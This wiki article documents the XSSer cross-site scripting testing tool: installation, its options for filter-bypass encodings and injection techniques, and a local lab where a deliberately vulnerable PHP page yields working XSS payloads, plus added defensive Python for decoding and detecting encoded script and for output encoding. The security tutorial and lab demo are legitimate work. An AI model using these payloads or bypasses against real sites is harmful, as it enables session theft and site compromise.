XSSer

From aldeid
THIS ARTICLE MAY BE OUTDATED.
This article could be partially or completely outdated and needs to be updated. Thank you for your comprehension.

Description

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It offers several options for bypassing certain filters, and a number of special code-injection techniques.

Version 1.0 of XSSer is known as "The Mosquito" and is written by psy (0x3CAA25B3 ;-).

Installation

Prerequisites

$ sudo apt-get install python \
  python-pycurl \
  python-beautifulsoup \
  python-libxml2

Installation of XSSer

Simple download

$ cd /data/src/
$ wget http://downloads.sourceforge.net/project/xsser/xsser-1.0.tar.gz
$ mkdir -p /pentest/web/
$ tar xvzf xsser-1.0.tar.gz -C /pentest/web/

Subversion

$ mkdir -p /pentest/web/
$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
$ chmod +x xsser/XSSer.py

Usage

Syntax

$ ./XSSer.py [OPTIONS] [-u <url> |-i <file> |-d <dork>]
  [-g <get> |-p <post> |-c <crawl>] [Request(s)] [Vector(s)]
  [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options

Common

--version
show program's version number and exit
-h, --help
show this help message and exit
-v, --verbose
verbose (default: no)
-s
show statistics with all injection attempts responses
-w
output all results directly to template (XSSlist.dat)
--xml=<filexml>
output 'positives' to aXML file (--xml filename.xml)
--publish
output 'positives' to Social Networks (identi.ca)
--short=<shorturls>
output -final code- shortered (tinyurl, is.gd)
--imx=<IMX>
create a false image with XSS code embedded
--fla=<FLASH>
create a false .swf file with XSS code embedded
--check
send a hash to pre-check if target repeats all content received (usefull to reduce 'false positive' results)
--launch
launch a browser at the end, with each 'positive' final code injection(s) discovered

Select Target(s)

At least one of these options must be specified to tell XSSer where to get its target URL(s) from:

-u <URL>, --url=<URL>
Enter target(s) to audit
-i <READFILE>
Read target urls from a file
-d <DORK>
Process search engine dork results as target urls
--De=<DORK_ENGINE>
Search engine to use for dorking (duck, altavista, bing, baidu, yandex, yebol, youdao, google, yahoo)

Select type of HTTP/HTTPS Connection(s)

These options specify which parameter(s) to use as the injection point for the payload.

-g <GETDATA>
Enter payload to audit using GET. (ex: '/menu.php?q=')
-p <POSTDATA>
Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c <CRAWLING>
Crawl target hierarchy parameters (can be slow!)
--Cw=<CRAWLER_WIDTH>
Number of urls to visit when crawling (deeping level)

Configure Request(s)

These options control how XSSer connects to the target(s). Several can be combined:

--cookie=<COOKIE>
Change your HTTP Cookie header
--user-agent=<AGENT>
Change your HTTP User-Agent header (default SPOOFED)
--referer=<REFERER>
Use another HTTP Referer header (default NONE)
--headers=<HEADERS>
Extra HTTP headers newline separated
--auth-type=<ATYPE>
HTTP Authentication type (value Basic or Digest)
--auth-cred=<ACRED>
HTTP Authentication credentials (value name:password)
--proxy=<PROXY>
Use proxy server (tor: http://localhost:8118)
--timeout=<TIMEOUT>
Select your Timeout (default 30)
--delay=<DELAY>
Delay in seconds between each HTTP request (default 8)
--threads=<THREADS>
Maximum number of concurrent HTTP requests (default 1)
--retries=<RETRIES>
Retries when the connection timeouts (default 3)

Select Vector(s)

These options specify the XSS vector (source code) to inject into each payload. Use one of them only if you do not want the common XSS vector that is injected by default. Choose only one option:

--payload=<SCRIPT>
OWN: Insert your XSS construction -manually-
--auto
AUTO: Insert XSSer 'reported' vectors from file

Select Bypasser(s)

These options encode the selected vector(s) in an attempt to bypass anti-XSS filters in the target's code and some IPS rules, if the target uses them. They can also be combined with other techniques to provide encoding:

--Str
Use method String.FromCharCode()
--Une
Use function Unescape()
--Mix
Mix String.FromCharCode() and Unescape()
--Dec
Use Decimal encoding
--Hex
Use Hexadecimal encoding
--Hes
Use Hexadecimal encoding, with semicolons
--Dwo
Encode vectors IP addresses in DWORD
--Doo
Encode vectors IP addresses in Octal
--Cem=<CEM>
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
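The Bypasser options above all express the same vector in a different encoding, which is exactly what defeats a log or WAF rule that matches only the literal string "<script". The following normaliser is an added example written for this page (it is not XSSer code and does not reproduce XSSer's own encoders): it peels the encoding layers the list names (String.fromCharCode() argument lists, unescape()-style %XX and %uXXXX sequences, and decimal or hexadecimal character references with or without semicolons) before a detection rule is applied. The sample request lines are constructed for the example.

```python
# Added example (not XSSer code): normalise the encodings the Bypasser options
# describe, then apply a plain "<script" detection rule to the decoded text.
import html
import re
import urllib.parse

# String.fromCharCode(60, 115, ...) -> the characters those code points name
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]*)\s*\)", re.IGNORECASE)
# JavaScript unescape() also understands %uXXXX, which urllib does not decode
PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def _decode_fromcharcode(match):
    codes = [c for c in match.group(1).replace(" ", "").split(",") if c]
    return "".join(chr(int(c)) for c in codes)


def decode_layers(text, max_rounds=5):
    """Peel encoding layers until the text stops changing.  The round limit
    keeps a pathological input from looping the normaliser forever."""
    for _ in range(max_rounds):
        before = text
        text = FROMCHARCODE.sub(_decode_fromcharcode, text)
        text = PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), text)
        text = urllib.parse.unquote(text)   # %3C -> <
        text = html.unescape(text)           # &#60; &#x3C; &#60 (no semicolon) -> <
        if text == before:
            break
    return text


def looks_like_script_injection(text):
    """Detection rule applied *after* normalisation."""
    return "<script" in decode_layers(text).lower()


# Constructed sample request lines, one per encoding named in the Bypasser list.
SAMPLE_REQUESTS = [
    "GET /index.php?xss=<script>alert(1)</script>",                          # plain
    "GET /index.php?xss=%3Cscript%3Ealert(1)%3C/script%3E",                  # URL-encoded / unescape()
    "GET /index.php?xss=&#60;script&#62;alert(1)&#60;/script&#62;",          # --Dec
    "GET /index.php?xss=&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;",      # --Hes (hex, semicolons)
    "GET /index.php?xss=&#x3cscript src=x&#x3e",                             # --Hex (no semicolons)
    "GET /index.php?xss=String.fromCharCode(60,115,99,114,105,112,116,62)",  # --Str
    "GET /index.php?xss=%u003Cscript%u003Ealert(1)",                         # unescape() %u form
    "GET /index.php?q=hello+world",                                          # benign
]


def flag_requests(lines=SAMPLE_REQUESTS):
    """Return the subset of request lines the normalised rule flags."""
    return [line for line in lines if looks_like_script_injection(line)]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(("FLAG " if looks_like_script_injection(line) else "pass ") + line)
```

Without the decode step only the first sample line matches; with it, every encoded variant is reduced to the same "<script" text and the benign query is left alone. In a real pipeline the normalised text is what you match signatures against, while the raw line is what you keep for the record.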

Special Technique(s)

These options try to inject code using different types of XSS techniques. You can select multiple:

--Coo
COO - Cross Site Scripting Cookie injection
--Xsa
XSA - Cross Site Agent Scripting
--Xsr
XSR - Cross Site Referer Scripting
--Dcp
DCP - Data Control Protocol injections
--Dom
DOM - Use Anchor Stealth (DOM shadows! No server logging!)

Select Final injection(s)

These options specify the final code to inject into vulnerable target(s), for exploiting the vulnerabilities you have discovered. Choose only one option:

--Fp=<FINALPAYLOAD>
OWN: Insert your final code to inject -manually-
--Fr=<FINALREMOTE>
REMOTE: Insert your final code to inject -remotely-
--B64
B64: Base64 code encoding in META tag (rfc2397)
--Dos
DOS: XSS Denial of service (client) attack!!

Special Final injection(s)

These options execute some 'special' injection(s) against vulnerable target(s). You can select multiple and combine them with your final code:

--Onm
ONM: Use onMouseMove() event to inject code
--Ifr
IFR: Use <iframe> source tag to inject code

Examples

Proof of Concept

Code

This example shows the simplest form of usage for XSSer:

$ ./XSSer.py -u "http://127.0.0.1" -g "poc/XSS/index.php?xss=1" --auto

The following code is vulnerable to non-persistent (also called reflected) XSS. With the default value secmode=0, the user input (the "xss" field) is not sanitized before being displayed.

<html>
<head>
<title>Non persistent (reflected) XSS</title>
</head>
<body>
<?php
$secmode = 0;
// 0 = Nothing (no sec :)
// 1 = Remove "<" and ">"
// 2 = Remove "<script|SCRIPT>" and "</script|SCRIPT>"
// 3 = Remove "script|SCRIPT"
if(isset($_GET["xss"])) {
  switch($secmode) {
    case 3: $ban = array("script"); break;
    case 2: $ban = array("<script>", "</script>"); break;
    case 1: $ban = array("<", ">"); break;
    case 0: $ban = ""; break;
  }
  $out = str_ireplace($ban, "", $_GET["xss"]);
  echo("<b>(SANITIZED) CONTENT: </b>");
  echo('<div style="border: solid 2px #ff0000; color: #ff0000; font-weight:bold;">'.$out.'</div>');
}
?>
<hr />
<form method="get" action="index.php">
  <input type="text" style="width:200px" name="xss" />
  <input type="submit" />
</form>
</body>
</html>


Results

Here are the results of XSSer run against this code with different values of secmode, i.e. with different strings removed from the user input before it is displayed.

Secmode 0

secmode 0
Sanitize filter Nothing (no sec :)
Results
  • Injections: 82
  • Failed: 73
  • Successful: 9
  • Accuracy: 10 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1<<SCRIPT>alert("XSS");//<</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//
  • http://127.0.0.1/poc/XSS/index.php?xss=1<SCRIPT>alert(/XSS/.source)</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1</TITLE><SCRIPT>alert("XSS");</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1<SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1<style></script>
  • http://127.0.0.1/poc/XSS/index.php?xss=1![CDATA[</script>
  • http://127.0.0.1/poc/XSS/index.php?xss=1[?][?]script>alert('XSS');[?][?]/script>
  • http://127.0.0.1/poc/XSS/index.php?xss=1</TITLE><SCRIPT>alert("XSS");</SCRIPT>

Secmode 1

secmode 1
Sanitize filter Remove "<" and ">"
Results
  • Failed: 81
  • Successful: 1
  • Accuracy: 1 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//
Note
Notice the double slash (//) at the end of the payload: after the leading quote breaks out of a JavaScript string, it comments out whatever follows the injection point, so the injected statement stays syntactically valid.

Secmode 2

secmode 2
Sanitize filter Remove "<script>", "<SCRIPT>", "</script>" and "</SCRIPT>"
Results
  • Failed: 80
  • Successful: 2
  • Accuracy: 2 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//
  • http://127.0.0.1/poc/XSS/index.php?xss=1[?][?]script>alert('XSS');[?][?]/script>

Secmode 3

secmode 3
Sanitize filter Remove "script" and "SCRIPT"
Results
  • Failed: 81
  • Successful: 1
  • Accuracy: 1 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//
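The four result tables above can be reproduced offline by modelling the PoC's str_ireplace() blacklists. The block below is an added example written for this page (it is neither XSSer's nor the PoC's code): it applies each secmode's replacement list to a few of the vectors from the secmode 0 table, counts a vector as a hit the way XSSer does (the response echoes the payload unmodified), and shows why only ";alert('XSS');// survives modes 1 to 3. It also shows the fix a defender would apply instead of a blacklist: contextual output encoding (PHP htmlspecialchars() with ENT_QUOTES, modelled here with html.escape), which neutralises every vector in the list. One caveat the tables do not state: reflection is not execution. In this PoC the input lands inside a <div>, so the ";alert('XSS');// vector only matters where input is reflected inside a JavaScript string; a reflection-based hit should be confirmed in a browser (the --launch option) before it is reported as exploitable.

```python
# Added example (not XSSer's or the PoC's code): model the PoC's four secmode
# blacklists, an XSSer-style "reflected unchanged?" check, and the output
# encoding fix that replaces the blacklist.
import html
import re

# Replacement lists copied from the PHP switch(); str_ireplace() is
# case-insensitive and applies the search strings one after another.
SECMODE_BANS = {
    0: [],                          # nothing removed (no sec :)
    1: ["<", ">"],
    2: ["<script>", "</script>"],
    3: ["script"],
}

# Query-string values taken from the page's secmode 0 injection-point list.
PAGE_VECTORS = [
    '1<<SCRIPT>alert("XSS");//<</SCRIPT>',
    '1";alert(\'XSS\');//',
    '1<SCRIPT>alert(/XSS/.source)</SCRIPT>',
    '1</TITLE><SCRIPT>alert("XSS");</SCRIPT>',
    '1<style></script>',
]


def sanitize(secmode, user_input):
    """Model of: $out = str_ireplace($ban, "", $_GET["xss"]);"""
    for needle in SECMODE_BANS[secmode]:
        user_input = re.sub(re.escape(needle), "", user_input, flags=re.IGNORECASE)
    return user_input


def reflected_unchanged(secmode, payload):
    """XSSer counts an injection when the response echoes the payload intact."""
    return sanitize(secmode, payload) == payload


def survivors(payloads=PAGE_VECTORS):
    """For each secmode, the vectors that come back unmodified."""
    return {mode: [p for p in payloads if reflected_unchanged(mode, p)]
            for mode in SECMODE_BANS}


def render_fixed(user_input):
    """The fix: encode for the HTML body context instead of blacklisting,
    i.e. PHP htmlspecialchars($out, ENT_QUOTES, 'UTF-8')."""
    return '<div>' + html.escape(user_input, quote=True) + '</div>'


def encoded_is_inert(user_input):
    """True when no raw HTML/attribute metacharacter survives the encoding."""
    encoded = html.escape(user_input, quote=True)
    return not any(c in encoded for c in '<>"\'')


if __name__ == "__main__":
    for mode, hits in survivors().items():
        print(f"secmode {mode}: {len(hits)} of {len(PAGE_VECTORS)} vectors reflected unchanged")
        for hit in hits:
            print("   ", hit)
    print("after output encoding, all inert:", all(encoded_is_inert(v) for v in PAGE_VECTORS))
    print(render_fixed(PAGE_VECTORS[0]))
```

Running it prints five hits for secmode 0 and exactly one (the ";alert('XSS');// vector) for each of the other modes, matching the page's tables; the encoded rendering of every vector contains no raw <, >, " or ', which is the property a blacklist can never guarantee.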

Advanced examples

Manual payload

 $ ./XSSer.py -u "http://127.0.0.1" -g "poc/xss/index.php?xss=" \
   --payload "<script>document.location='http://www.google.com'</script>"
===========================================================================

XSSer v1.0: "The Mosquito" // (2010) - (Copyright - GPLv3.0) // by psy

===========================================================================
Testing [XSS from URL] injections... you have your target good defined ;)
===========================================================================

===========================================================================
Target: http://127.0.0.1 --> 2011-02-08 21:25:02.477776
===========================================================================

-------------------------
[+] Trying: http://127.0.0.1/poc/xss/index.php?xss=<script>document.location='http://www.google.com'</script>
[+] Browser Support: [manual_injection]
[+] Checking: url attack with <script>document.location='http://www.google.com'</script>... ok

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 0
- Sucessfull: 1
- Accur: 100 %

===========================================================================
[*] List of possible XSS injections:
===========================================================================

[I] Target: http://127.0.0.1
[+] Injection: http://127.0.0.1/poc/xss/index.php?xss=<script>document.location='http://www.google.com'</script>
[-] Method: manual
--------------------------------------------------

Go further

For more information, visit the official website: http://xsser.sourceforge.net/
